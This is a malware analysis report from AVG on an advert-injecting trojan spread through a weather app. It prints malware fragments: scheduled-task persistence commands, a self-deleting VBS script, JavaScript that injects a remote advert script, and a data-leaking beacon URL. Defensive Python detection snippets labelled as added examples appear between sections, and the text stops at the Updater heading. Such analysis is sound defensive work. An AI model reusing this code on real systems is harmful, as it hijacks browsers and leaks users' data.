Page 1: Weather Forecast for Today? Advert Flood Coming from East

Weather Forecast for Today? Advert Flood Coming from East

Case study of an advert injector installed via a weather forecast application

Jakub Křoustek

AVG Technologies, Virus Lab

October 2015

© 2015 AVG Technologies. All Rights Reserved.

Contents

1 Introduction
2 Spreading
3 Malware Deployment
3.1 Dropper
3.2 Malware Installer (LiteC.exe)
4 Injection in Browsers
4.1 Internet Explorer
4.2 Firefox
4.3 Chrome
4.4 Behavior of Infected Browsers
5 Hidden Adverts
6 Updater
7 Digging for Information
8 Conclusion and Indicators of Compromise
IOC (Indicators of Compromise)
Appendix A – SHA256 Check-sums of Analyzed Samples


1 Introduction

Despite blocking efforts, online advertising is a daily part of our lives. Most of us have got used to a certain volume of adverts displayed every day, but authors of malicious code try to push our limits much further via the advert-injection techniques used in today's malware threats. As Google and other institutions pointed out in recent research: “We found that ad injection has entrenched itself as a cross-browser monetization platform impacting more than 5% of unique daily IP addresses accessing Google – tens of millions of users around the globe.”1

In this post, we present a case study of one such malware that we detected via our AVG Identity Protection (IDP) component. The user infection starts while installing an application proclaimed by its authors as a "Weather Forecast Application". However, once installed, this application downloads and installs other components that are purely malicious, as we present in the following technical analysis.

Figure 1 – WeatherApp – the infection vector.

Among other things, this threat tries to infect all the installed browsers and inject additional adverts into the visited pages. Furthermore, it periodically loads another batch of adverts in the background without notifying the user. As a side-effect, it sacrifices the security and performance of the infected systems. All of that is done to gain the profit paid by advert providers.

At the end of this study, we present several details about the background of this infection and its authors.

1 Quoted from http://research.google.com/pubs/pub43346.html


2 Spreading

Based on our telemetry, this infection is currently highly active and is reaching its peak.

Figure 2 – Total number of detected samples.

The most affected countries are the United States and Germany, followed by Saudi Arabia and the United Arab Emirates.

Figure 3 – Countries most affected by spreading of this infection (Jun-Sep 2015).

[Figure 2 chart: daily count of detected samples ("Total") with a linear trend line; x-axis from 1.6.2015 to 24.8.2015, y-axis from 0 to 7000.]


3 Malware Deployment

Delivery of similar threats is usually done via drive-by download (e.g. the user visits a particular website or receives a download link in a spam email) or the threat is installed on the computer through another program.

In this case, the delivery of the malware toolchain is done via a seemingly harmless weather-forecast application available from the web page http://www.jasonschober.net/. The application itself is hosted on the Amazon Web Services (AWS) cloud.

Figure 4 – Homepage of the WeatherApp (i.e. the input vector).

The downloaded Nullsoft Install System (NSIS) installer WeatherAppSetup.exe deploys a very simple weather forecast application, which only displays the following webpage within the application window: http://www.deltaweather.com/weatherApp.php?location=London,UK.

Figure 5 – The first installer.


Figure 6 – “Dummy” application for weather forecast (serving first adverts).

Moreover, the installer silently extracts the second application GUP.exe, which is the entry point of the infection – it periodically downloads and installs the latest versions of the malicious toolchain described in the next part2.

Furthermore, the weather application supports an uninstallation process. However, this does not apply to the second application, which stays untouched by the uninstaller. This is clearly the intended behavior.

3.1 Dropper

The malicious toolchain exists in many different versions that are distributed with different filenames, program icons, used packers, etc. For our analysis, we selected the executable file named 5.exe that we first detected in August 2015. Furthermore, we also mention the differences with the latest version (rinm.exe, September 2015) via the "UPDATE" tag in the text.

File 5.exe is a dropper also created by using NSIS. Furthermore, the NSIS SelfDel.dll plugin has been used for deleting the dropper immediately after its task is complete.

2 The WeatherApp installer also dumps and executes the application sysinfo.exe, which acts similarly to the LiteC.exe dropper described later in the text (e.g. reporting to a remote site).


Figure 7 – NSIS installer of the malicious toolchain.

Before deleting itself, the dropper extracts and executes another file from the following location: C:\Users\{UserName}\AppData\Roaming\LiteC.exe.

3.2 Malware Installer (LiteC.exe)

LiteC.exe is yet another dropper, which acts similarly to an installer – it deploys applications and libraries, registers them to run automatically, etc.

Figure 8 – Visualization of the installed malware components.

UPDATE: The latest version uses only one installer, i.e. the LiteC.exe part is no longer used – it integrates both parts into a single part.

This file LiteC.exe is digitally signed and issued for Irina Mihaylovna ([email protected], Sofia, Bulgaria).


Figure 9 – Digital signature (2015).

The previous versions were also signed, but for Irina Polyanskaya (again Sofia, Bulgaria). We will refer to this information at the end of this study.

Figure 10 – Digital signature (2014).

First of all, LiteC checks whether it is running in a virtualized or emulated environment.


3.2.1 VM Checks

The VM checking is done via a quite rich set of conditions, such as:

- Detecting the presence of a running debugger: IsDebuggerPresent(), GetTickCount(), CheckRemoteDebuggerPresent(), etc.;
- Detecting VMware and VirtualBox in the BIOS:
  o serial number: "wmic.exe /output:"sn.txt" bios get serialnumber"
  o "HKLM\HARDWARE\Description\System\VideoBiosVersion"
  o "HKLM\HARDWARE\Description\System\SystemBiosVersion"
- Checking the username of the current user: "SANDBOX" and "VIRUS";
- Checking whether the process name contains strings such as "SAMPLE", "VIRUS", or "SANDBOX";
- Detecting Sandboxie via the loaded library sbiedll.dll;
- Detecting Wine via the presence of the function wine_get_unix_file_name() within the kernel32.dll library;
- Checking for the identifiers vmware and vbox in registry keys:
  o "HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0\Identifier"
  o "HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0\Identifier"
- Detecting installed VirtualBox and VMware guest additions and/or drivers:
  o "HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions"
  o "HKLM\SOFTWARE\VMware, Inc.\VMware Tools"
  o GetFileAttributesW(L"C:\\WINDOWS\\system32\\drivers\\VBoxMouse.sys");
  o GetFileAttributesW(L"C:\\WINDOWS\\system32\\drivers\\vmmouse.sys");
  o GetFileAttributesW(L"C:\\WINDOWS\\system32\\drivers\\vmhgfs.sys");

However, some of these checks are not properly implemented and they fail to detect the VM.

3.2.2 Malware Extraction

After the initial checks, LiteC.exe creates a temporary directory where it extracts two files from its resources: Unrar.exe and Ob.dat, e.g. C:\Users\{UserName}\AppData\Local\{D1C06B0A-5E74-4F7A-B607-76DE1A806B98}.

Figure 11 – Two files hidden in resources of LiteC.exe.


Unrar.exe is a freeware utility bundled with this malware, which is used for extraction of the RAR file Ob.dat.

Figure 12 – UNRAR utility used for extraction of the malware.

However, the RAR archive is password protected and the key is stored enciphered within LiteC.exe (the deciphered key for this particular dropper is "lblduXWYn").

The archive itself contains the following files, which are extracted into the target folders one by one via function calls similar to this one (each component is extracted with its own call, elevated via the "runas" verb):

ShellExecute(NULL, "runas",
    "C:\\Users\\{UserName}\\AppData\\Local\\{random}\\Unrar.exe",
    "x \"C:\\Users\\{UserName}\\AppData\\Local\\{Random}\\Ob.dat\" "
    "\"gup.xml\" \"C:\\Users\\{UserName}\\AppData\\Roaming\\PlusN\" "
    "-p\"lblduXWYn\" -y ", /*...*/);

- Updater: GUP.exe and gup.xml into "C:\Users\{UserName}\AppData\Roaming\PlusN\" (other used directory names are "NewNotepad", "charts", "Bonzo", "Cucckoo", "benko", etc.). Both files are also copied to "C:\ProgramData\Convertor\" as Convertor.exe and gup.xml;
- IE plugins: Files PdfConv_32.dll and PdfConv_64.dll are extracted into the directory "C:\Users\{UserName}\AppData\Roaming\pdfie\";
  UPDATE: The files were renamed to Nets_32.dll and Nets_64.dll and moved into a different directory: "C:\Users\{UserName}\AppData\Roaming\nets\";
- Firefox add-on: Folder "firefox" containing multiple files (install.rdf, chrome.manifest, etc.) into the Firefox installation directory (if found), e.g. "C:\Program Files (x86)\Mozilla Firefox\distribution\bundles\";
  UPDATE: To leave no doubt about the authorship of this malicious add-on, the authors renamed it from "firefox" to "[email protected]" in the latest version.
- Installer of the Chrome extension: The executable file rinti.exe is extracted into the directory "C:\Users\{UserName}\AppData\Roaming\{random string, e.g. JyyvL52l}\";
- Downloader of the PhantomJS-based background advert downloader: de10.exe into the directory "C:\Users\{UserName}\AppData\Roaming\ornaldo\".
  UPDATE: This component is not installed by the latest version at the moment.


Afterwards, it checks for the presence of the CURL3 libraries within the system directory. Those libraries are actually necessary for running the applications GUP.exe and Convertor.exe. If they are absent, LiteC downloads these libraries from the official web4 via the Urlmon function URLDownloadToFileW(). After the download, the zip archive is extracted into the system directory, e.g. "{Windows}\system32".

UPDATE: CURL libraries are now directly included into the initial installer WeatherAppSetup.exe.

3.2.3 Creating Tasks

After that, LiteC registers the newly created executables to start automatically. This functionality is usually done via the Windows Registry (e.g. the Run and RunOnce keys), but not in this case. LiteC uses the Windows Task Scheduler for automatic and periodic execution of these files.

Figure 13 – Scheduling malicious tasks.

Some of these tasks are run periodically (e.g. downloading adverts in the background), some only while the computer is idle (e.g. automatic update), and the remaining tasks are executed right after user login (e.g. infection of Chrome).

The tasks are created via commands such as the following (a logon-triggered task named "DriverMgr", run with the highest privileges via /RL H):

schtasks.exe /Create /TR "C:\Users\{UserName}\AppData\Roaming\{random}\rinti.exe" /SC ONLOGON /TN "DriverMgr" /RL H

LiteC also handles any previously installed versions by deleting the existing tasks:

schtasks.exe /Delete /tn "DriverMgr" /f
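As an added example (not AVG's code and not part of the report), the following Python triages a `schtasks.exe /Query /FO CSV /V` export for the persistence pattern described above: a task whose binary lives under a user-writable directory, with a logon or idle trigger. The input is a constructed subset of the real columns; the task names and paths are modelled on this report, and the trigger strings are assumed to be the ones schtasks prints on an English system.

```python
import csv
import io
import re

# Constructed sample in the shape of "schtasks.exe /Query /FO CSV /V"
# output, keeping only four of its columns. Names and paths follow the
# report (DriverMgr -> rinti.exe, Convertor.exe in ProgramData).
SAMPLE_CSV = r'''"HostName","TaskName","Task To Run","Schedule Type"
"PC1","\DriverMgr","C:\Users\alice\AppData\Roaming\JyyvL52l\rinti.exe","At logon time"
"PC1","\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c","Weekly"
"PC1","\Convertor","C:\ProgramData\Convertor\Convertor.exe","At idle time"
"PC1","\Adobe Acrobat Update Task","C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe","Daily"
'''

# Directories that legitimate vendors rarely schedule binaries from, but
# where every component of this toolchain is extracted (section 3.2.2).
USER_WRITABLE = re.compile(
    r"\\(AppData\\(Roaming|Local)|ProgramData|Temp)\\", re.IGNORECASE)

# Triggers the report attributes to the toolchain: logon (Chrome
# infector), idle (updater) and short periodic runs (advert downloader).
# The strings are assumed to match schtasks output on an English locale.
NOTABLE_TRIGGERS = {"At logon time", "At idle time", "Minute"}


def triage_tasks(csv_text):
    """Return the tasks whose action runs from a user-writable directory.

    Each hit carries the task name, the binary and the reasons it was
    flagged, so the result can feed a ticket or a detection rule."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        action = row.get("Task To Run", "")
        if not USER_WRITABLE.search(action):
            continue
        reasons = ["binary in user-writable directory"]
        trigger = row.get("Schedule Type", "")
        if trigger in NOTABLE_TRIGGERS:
            reasons.append("trigger: " + trigger)
        hits.append({"task": row["TaskName"], "action": action,
                     "reasons": reasons})
    return hits


def task_names(csv_text):
    """Convenience wrapper: just the names of the flagged tasks."""
    return [hit["task"] for hit in triage_tasks(csv_text)]


if __name__ == "__main__":
    for hit in triage_tasks(SAMPLE_CSV):
        print(hit["task"], "->", hit["action"], "|", "; ".join(hit["reasons"]))
```

On a live host, feed the script the real output of the schtasks query instead of SAMPLE_CSV; built-in tasks under \Microsoft\ are not flagged because they do not run from these directories.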

3.2.4 Calling Home

After the successful installation of its components, LiteC “calls home” with details about the infected system. It contacts the domain http://www.affiliatesys.info, e.g.:

http://www.affiliatesys.info/AF/sucess/thanks.php?rnd=1366912762&affid=1010&affsource=1010&av=None&win=Microsoft+Windows+XP+Professional+Service+Pack+3+(build+2600)&RAM=1.00+GB&Processor=Intel(R)+Xeon(R)+CPU+E5-2620+0+@+2.00GHz&Cores=1&v=1&re=161&uid=HOME-xxxx-xxxx-xxxx-xxxx-xxx&hds=65344646&prx=0&mac=xx:xx:xx:xx:xx:xx&net=3.5

In other words, it sends information about the installed OS, CPU and RAM details, MAC address, version of LiteC, installed .NET version, installed antivirus software, ID of the campaign, etc.
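The beacon above decoded and matched, as an added example that is not part of the report: the Python below splits the query string into the fields it leaks, recognises the beacon by its reporting hosts or by the combination of parameters it carries, and runs that check over a few constructed proxy-log lines (the log format and the example.invalid host are constructed for this example).

```python
from urllib.parse import urlsplit, parse_qs

# The plaintext beacon quoted in the report (the xx fields are masked there).
BEACON = ("http://www.affiliatesys.info/AF/sucess/thanks.php?rnd=1366912762"
          "&affid=1010&affsource=1010&av=None"
          "&win=Microsoft+Windows+XP+Professional+Service+Pack+3+(build+2600)"
          "&RAM=1.00+GB&Processor=Intel(R)+Xeon(R)+CPU+E5-2620+0+@+2.00GHz"
          "&Cores=1&v=1&re=161&uid=HOME-xxxx-xxxx-xxxx-xxxx-xxx&hds=65344646"
          "&prx=0&mac=xx:xx:xx:xx:xx:xx&net=3.5")

# Reporting hosts named in the report (plaintext and AES-wrapped variants).
KNOWN_HOSTS = {"www.affiliatesys.info", "www.affsystem.info"}

# Parameters that together fingerprint this beacon even on a host that is
# not yet listed: campaign id, antivirus, Windows version, uid, MAC.
FINGERPRINT_KEYS = {"affid", "av", "win", "uid", "mac"}

# What each parameter discloses, following the report's description.
FIELD_MEANING = {
    "affid": "campaign/affiliate id", "av": "installed antivirus",
    "win": "Windows version", "RAM": "memory", "Processor": "CPU model",
    "Cores": "CPU cores", "v": "LiteC version", "net": ".NET version",
    "mac": "MAC address", "uid": "machine id", "hds": "disk id",
    "prx": "proxy in use",
}


def parse_beacon(url):
    """Decode the query string into {parameter: value}, '+' meaning space."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {key: values[0] for key, values in query.items()}


def leaked_fields(url):
    """Human-readable (meaning, value) pairs for the fields the beacon leaks."""
    fields = parse_beacon(url)
    return [(FIELD_MEANING[k], v) for k, v in fields.items() if k in FIELD_MEANING]


def is_litec_beacon(url):
    """True for a known reporting host, or for any URL that carries the
    fingerprint parameters (the AES variant only matches by host)."""
    parts = urlsplit(url)
    if parts.hostname in KNOWN_HOSTS:
        return True
    return FINGERPRINT_KEYS <= set(parse_qs(parts.query).keys())


# Constructed proxy log, one "<time> <client ip> <method> <url>" per line.
SAMPLE_LOG = [
    "2015-08-12T10:00:01 10.0.0.5 GET " + BEACON,
    "2015-08-12T10:00:02 10.0.0.7 GET http://www.avg.com/",
    "2015-08-12T10:00:03 10.0.0.9 GET http://example.invalid/t.php?affid=1&av=x"
    "&win=7&uid=HOME-1&mac=00:11:22:33:44:55",
]


def infected_clients(log_lines):
    """Client IPs that sent a beacon, in first-seen order, without repeats."""
    seen = []
    for line in log_lines:
        _, client, _, url = line.split(" ", 3)
        if is_litec_beacon(url) and client not in seen:
            seen.append(client)
    return seen


if __name__ == "__main__":
    for meaning, value in leaked_fields(BEACON):
        print(f"{meaning:22} {value}")
    print("beaconing clients:", infected_clients(SAMPLE_LOG))
```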

UPDATE: As we found out by using our Retargetable Decompiler5, the authors started using a public implementation6 of the AES algorithm for enciphering these messages (it uses the CBC mode7, an empty initialization vector and a hardcoded hexadecimal key "159DEAD951FD29701F0C5D751522FBF51A8C66FD46E79539C53B64F659DDAA26"), e.g.:

http://www.affsystem.info/aff/thanks/thanks3.php?code=7F39ACC132838C4141F3C1507E6D426D8CEC5F1865D57DB2249C52C67F14A85ACF56F5AD9765BFD59301F213418E4DC65CF9620931F80F564667317F85A3D72391BD359C560490B8E254943A514DC21B0E186E4DC304FFDC2973C9D3E4EF8...

3 http://curl.haxx.se/
4 http://curl.haxx.se/gknw.net/7.40.0/dist-w32/curl-7.40.0-devel-mingw32.zip
5 https://retdec.com/

3.2.5 Clean-up

At the end, LiteC.exe deletes itself by using the newly created VBS script C:\Users\{UserName}\AppData\Local\{random}.vbs (the script also deletes itself to cover tracks):

WScript.Sleep 1500
Dim fso
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile("C:\Users\{UserName}\AppData\Roaming\LiteC.exe")
fso.DeleteFile(Wscript.ScriptFullName)

Figure 14 – VBS clean-up script.

6 http://www.codeproject.com/Articles/1380/A-C-Implementation-of-the-Rijndael-Encryption-Decr
7 https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Cipher_Block_Chaining_.28CBC.29


4 Injection in Browsers

The main purpose of this malware is to display adverts and thus earn profit for its authors (“monetization”, in the authors' own terms). To achieve this, all the major browsers are infected by malicious add-ons.

4.1 Internet Explorer

The integration in Internet Explorer is done via the so-called "Browser Helper Objects"8. Those are DLL modules designed by Microsoft to work as browser plugins that are loaded during the browser's startup. The malware authors prepared two such “plugins” (32-bit and 64-bit), located in: C:\Users\{UserName}\AppData\Roaming\pdfie\PdfConv_32.dll and PdfConv_64.dll.

UPDATE: Nets_32.dll and Nets_64.dll

Both DLLs are registered via another VBS script (chr(34) is the quotation mark character, used to quote the paths):

Set objShell = WScript.CreateObject("WScript.Shell")
objShell.Run "Regsvr32 /s " & chr(34) & "C:\Users\{UserName}\AppData\Roaming\pdfie\PdfConv_32.dll" & chr(34)
objShell.Run "Regsvr32 /s " & chr(34) & "C:\Users\{UserName}\AppData\Roaming\pdfie\PdfConv_64.dll" & chr(34)

Figure 15 – Registering IE plugins via VBS.

Furthermore, both of them are signed by the aforementioned digital certificate for Irina Mihaylovna and they are internally identified as "Vonteera Safe ads" by AdTech.

UPDATE: The plugins are no longer digitally signed, but their behavior remains the same.

4.2 Firefox

As we already mentioned, infection of Firefox is done via installation of an add-on into "{Firefox installation directory}\distribution\bundles\". Mozilla provided this directory as a standard mechanism for enterprises to deploy extensions. However, it has been largely abused by malware authors (as in this case) and Mozilla discontinued this feature in version 40 (see the developers' discussion9). Therefore, this malware add-on does not work in Firefox version 40+.

In the previous Firefox versions, add-ons installed via the distribution\bundles folder were not listed in the extensions list and thus the user could not simply remove them:

8 https://en.wikipedia.org/wiki/Browser_Helper_Object
9 https://bugzilla.mozilla.org/show_bug.cgi?id=1144127


Figure 16 – The malicious add-on is not listed in Firefox.

However, the presence of the AdTech add-on can still be checked via the about:config page:

Figure 17 – Firefox about:config page containing Adtech references.

According to the installed file install.rdf, the add-on refers to itself as "Super Web Accelerator ! by AdTech".

Figure 18 – The install.rdf file used in Firefox add-on.


4.3 Chrome

Infection of Chrome is (again) quite tricky. It is done via the aforementioned application rinti.exe, which at first instructs Chrome to install an official extension, "Google Quick Scroll"10 (its ID in the Chrome Web Store is "okanipcmceoeemlbjnmnbdibhgpbllgc").

The installation is done via the Chrome technique called “force-install”11, which is provided by Google to enterprises for installing predefined extensions. However, as in Firefox, this feature is being misused by malware authors.

As a result, rinti.exe creates the following registry key and Chrome downloads and installs that extension right after its start.

Figure 19 – Forcing Chrome to install an extension.

Unlike in Firefox, the extension is listed in Chrome. However, it cannot be uninstalled because of the force-install policy in use.

Figure 20 – Forcefully installed Chrome extension.

10 https://chrome.google.com/webstore/detail/google-quick-scroll/okanipcmceoeemlbjnmnbdibhgpbllgc?hl=en
11 https://dev.chromium.org/administrators/policy-list-3#ExtensionInstallForcelist
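One way to audit a machine for this force-install trick, as an added example that is not part of the report: the Python below parses a .reg export of Chrome's ExtensionInstallForcelist policy key and reports every forced extension, naming the two extensions this report documents as hijacked. The registry path is Chrome's documented policy location and the Web Store update URL is Chrome's standard one; both are assumptions here, since Figure 19 is not reproduced in the text, and the .reg text itself is constructed.

```python
import re

# Constructed .reg export of the policy key. The two ids are the extensions
# the report names ("Google Quick Scroll" and "word highlight"); the key
# path and update URL are assumed (documented Chrome policy defaults).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist]
"1"="okanipcmceoeemlbjnmnbdibhgpbllgc;https://clients2.google.com/service/update2/crx"
"2"="ooabkmkhabkahcjbgpiajffckeibpdoa;https://clients2.google.com/service/update2/crx"
'''

FORCELIST_KEY = re.compile(r"^\[HKEY_.*\\ExtensionInstallForcelist\]$")
VALUE_LINE = re.compile(r'^"(\d+)"="([^"]*)"$')
# Chrome extension ids are 32 characters drawn from the letters a-p.
EXTENSION_ID = re.compile(r"^[a-p]{32}$")
WEB_STORE_UPDATE = "https://clients2.google.com/service/update2/crx"

# Extensions the report documents as carriers of the rewritten JavaScript.
REPORTED_IDS = {
    "okanipcmceoeemlbjnmnbdibhgpbllgc": "Google Quick Scroll",
    "ooabkmkhabkahcjbgpiajffckeibpdoa": "word highlight",
}


def parse_forcelist(reg_text):
    """Return [(value name, extension id, update url)] for every entry
    under an ExtensionInstallForcelist key in a .reg export."""
    entries = []
    in_key = False
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("["):
            # A new key header: only values under the forcelist key count.
            in_key = bool(FORCELIST_KEY.match(line))
            continue
        m = VALUE_LINE.match(line) if in_key else None
        if not m:
            continue
        ext_id, _, update_url = m.group(2).partition(";")
        entries.append((m.group(1), ext_id, update_url))
    return entries


def audit_forcelist(reg_text, managed=False, allowlist=()):
    """Findings as (extension id, reason). On an unmanaged home PC any
    forced extension is a finding; on a managed one, only ids outside the
    allowlist, ids the report names, or entries with a foreign update URL."""
    findings = []
    for _, ext_id, update_url in parse_forcelist(reg_text):
        if not EXTENSION_ID.match(ext_id):
            findings.append((ext_id, "malformed extension id"))
            continue
        if ext_id in REPORTED_IDS:
            findings.append((ext_id, "hijacked in this campaign: " + REPORTED_IDS[ext_id]))
        elif not managed or ext_id not in allowlist:
            findings.append((ext_id, "force-installed outside policy"))
        elif update_url != WEB_STORE_UPDATE:
            findings.append((ext_id, "update URL is not the Web Store"))
    return findings


if __name__ == "__main__":
    for ext_id, reason in audit_forcelist(SAMPLE_REG):
        print(ext_id, "-", reason)
```

Removing the offending values from the policy key (and the task that recreates them) is what makes the extension removable again in Chrome's extension list.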


Force installation of some Google extension wouldn't be that bad. However, rinti.exe replaces the extension's code with its own code extracted from resources.

Figure 21 – JavaScript code hidden in resources of the rinti.exe infector.

This extracted code overwrites the original JavaScript located in the file C:\Users\{UserName}\AppData\Local\Google\Chrome\User Data\Default\Extensions\okanipcmceoeemlbjnmnbdibhgpbllgc\background_with_deps.js, which leads to a totally different behavior.

Figure 22 – Code comparison of the original Chrome extension and the infected one.

This behavior is almost the same for all the add-ons installed in IE/Firefox/Chrome and we describe it in detail in the following part.

UPDATE: The previously used extension has been classified as deprecated by Google and the malware authors were forced to switch to another extension – “word highlight”12. And again, they parasitize this extension by rewriting its JavaScript file background.js.

4.4 Behavior of Infected Browsers

All of these add-ons try to inject malicious code into all newly opened browser panels/windows. As its authors left in a comment (main.js in the Firefox add-on):

//the main js script loads everytime a new browser instance is loaded

For example, the following code13 is from the IE plugin:

12 https://chrome.google.com/webstore/detail/word-highlight/ooabkmkhabkahcjbgpiajffckeibpdoa?hl=en
13 This is a de-obfuscated version of the script.


var WorkingObj = {
    // Called once the page has loaded; only http(s) pages are targeted.
    DocumentComplete: function(_href) {
        var hrefTokens = _href["split"]("/");
        if (hrefTokens["length"] < 3) {
            return;
        }
        if ((hrefTokens[0] != "http:") && (hrefTokens[0] != "https:")) {
            return;
        }
        WorkingObj["inject_script"](hrefTokens[0]);
    },
    // Appends a <script> tag pointing at the advert server, choosing the
    // scheme that matches the visited page so the browser does not block it.
    inject_script: function(http_s) {
        var _head = document["getElementsByTagName"]("head")[0];
        var _script = document["createElement"]("script");
        _script["type"] = "text/javascript";
        if (http_s == "https:") {
            _script["src"] = "https://www.adfactorytech.com/a/jstps.js";
        } else {
            _script["src"] = "http://www.adfactorytech.com/a/jstp.js";
        }
        _script["id"] = "adfactory_js";
        _head["appendChild"](_script);
    }
};
WorkingObj.DocumentComplete(document["location"]["href"]);

Figure 23 – De-obfuscated JavaScript code used within the IE plugin.

The purpose of this initial JavaScript is to download and execute another JavaScript from the authors' server www.adfactorytech.com. As we can see, there are two different versions of this script – one for pages visited via HTTP (jstp.js) and the other one for HTTPS (jstps.js).

UPDATE: More and more domains are used for hosting this advert-serving JavaScript, e.g. http://www.jasonadssrv.com/, http://adnetworkus.com/, http://www.advantagz.com/.

An example of one such advert, which will be injected afterwards:

Figure 24 – Example of an advert that will be injected into a visited page.

These scripts (which are based on jQuery v1.8.014) support several methods of displaying adverts within the used browser:

14 https://jquery.com/


1. Injecting adverts into visited pages along with the “original” adverts displayed by these sites. For example, it injects multiple IFRAMEs with adverts into http://search.ask.com.

Figure 25 – Injecting adverts in visited pages.

However, the injection process is far from flawless and the user sometimes encounters injected “page not found” messages instead of adverts:

Figure 26 – Adverts cannot be found.


2. Displaying pop-up windows, which totally cover the user’s desktop:

Figure 27 – Flood of pop-up windows15.

3. Opening a new page with adverts once the user clicks anywhere on the currently displayed page (a hidden onclick JavaScript function is used to do that).

4. Some versions also hook all the newly created browser panels and redirect them to predefined pages. This behavior can be used, for example, for a redirection to advert pages or for hijacking the user's homepage.

// List of hardcoded pages opened in a hooked panel
['https://s3.amazonaws.com/addchh/sRCH.html'],
['https://s3.amazonaws.com/addnnch/uio4CHd.html'],
['https://s3.amazonaws.com/addns/C908/MdCHfs.html'],
['https://s3.amazonaws.com/addns/CH3088/CvCHff.html'],
['http://www.adfactorytech.com/resources/Re/Chnh/mov.php']
// which leads to a final redirect to e.g.
// http://www.search.ask.com/?s=nTabCH&id=da538771-549e-4b52-9809-fbb4892bf7b9

5. Another tricky feature is the replacement of “official” adverts (i.e. those delivered by page owners) by the injected ones, i.e. the new advert is placed in exactly the same position as the original one.

15 Many of the weather-forecast pages displayed in this figure belong to the same person as the original WeatherApp. Those pages are full of adverts, so opening them generates an income for their owner.


Figure 28 – Advert replacement feature in action (1) – the original advert.

Figure 29 – Advert replacement feature in action (2) – the replacing advert.

The particular method is chosen based on several conditions, e.g.:

- Match of a visited URL, e.g. http://search.ask.com, http://badoo.com, http://bbc.com, http://cnn.com, http://weather.com;
- Match of a whitelisted site (i.e. no additional adverts will be displayed on it);
- Whitelisting pages containing any of the "pornWords" in their name.

Figure 30 – Page filters used by malicious JavaScript.

Once the particular action has been chosen, the advert-serving domain (e.g. www.adfactorytech.com) is contacted again via the following requests:


var DOMAIN = 'http://www.adfactorytech.com';
var urls = {
    main_fnn: function () {
        return DOMAIN + "/b/tp/Starter.php?site=" + encodedHostname + "&w=" + screenWidth;
    },
    poptp: function () {
        return DOMAIN + "/b/tp/servePop.php?site=" + encodedHostname + "&w=" + screenWidth;
    },
    addChks: function () {
        return DOMAIN + "/b/tp/serveDo.php?site=" + encodedHostname + "&w=" + screenWidth;
    }
};

Figure 31 – Creating requests for adverts that will be injected.

In other words, the script sends information about all the visited web pages (and other details) to a remote server. Based on this information, the server chooses an advert to be downloaded and displayed. This is truly Trojan-like behavior because (1) it silently sniffs the user's communication and (2) the downloaded content may be malicious as well (e.g. the recent malvertisement16 campaign served via Google AdSense17). In the following figure, we can clearly see that the details about a visited page (http://www.avg.com) are sent to a remote server.

Figure 32 – The browser add-ons are sniffing user-visited pages.

The browser add-ons also try to update themselves every day, which is an alternative to the GUP.exe updater.

16 https://en.wikipedia.org/wiki/Malvertisement
17 http://www.securityweek.com/malvertising-campaign-abuses-google-adsense


5 Hidden Adverts

The aforementioned methods of displaying adverts have one major drawback for their authors – they generate profit only when the user browses the web. Otherwise, the infected computer generates no profit. Therefore, they figured out a way to earn money from online advertisement even when the user is not browsing the web. They secretly download the so-called headless browser18 PhantomJS19 onto the infected PC and simulate advert impressions20 in the background without any user interaction or notification. That is yet another Trojan-like behavior.

This feature is delivered to the infected machine via the aforementioned application de10.exe, which downloads an 11 MB self-extracting RAR archive called aofgs.exe. The extracted folder (e.g. C:\users\{UserName}\appdata\roaming\orlando\Vipp\) consists of several applications, configuration files, and automation scripts.

Figure 33 – Downloaded package with the headless browser PhantomJS.

The archive contains the PhantomJS executable, which is a so-called headless browser. It is basically a classical browser that is controlled via command-line arguments and which is easily scriptable (i.e. automated visiting of predefined webpages, clicking links, etc.). This is a perfect setup for someone who tries to automatically generate many advert impressions and/or clicks.

PhantomJS is configured by configuration files in the JSON format. These files are downloaded from remote servers, such as AWS (https://s3.amazonaws.com/apsrunner/paras.json, https://s3.amazonaws.com/apssrun/prmtrs.json).

18 https://en.wikipedia.org/wiki/Headless_browser
19 http://phantomjs.org/
20 https://en.wikipedia.org/wiki/Impression_%28online_media%29


{
    "proxy_list": [
        "direct"
    ],
    "replace_url_list": [
        "http://www.freewebseotools.com/API/H/ad.php"
    ],
    "ua_list": [
        "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36",
        "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0",
        "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36 OPR/25.0.1614.68",
        "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36",
        "...",
        "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"
    ],
    "url_list": [
        "http://www.freewebseotools.com/seo/",
        "http://www.freewebseotools.com/miscellaneous/",
        "http://www.freewebseotools.com/main-website/",
        "http://www.freewebseotools.com/new-tools/",
        "http://www.freewebseotools.com/web-tools/"
    ]
}

Figure 34 – Sample file used for configuration of PhantomJS.

As we can see, it contains a list of user agents (i.e. PhantomJS will look like Firefox or Chrome in the eyes of advert providers) and a link to a server (http://www.freewebseotools.com), which will provide fresh adverts for displaying/clicking.

Finally, execution of PhantomJS is controlled by a simple .NET application mbd.exe, which is executed every 30 minutes by the Task Scheduler. Apart from some trivial anti-VM checks, mbd.exe executes PhantomJS in the background multiple times with the downloaded configuration. Moreover, its authors try to avoid disclosure of this shady business by advert providers: they download only a few adverts at a time and then take a break for a few minutes.


6 Updater

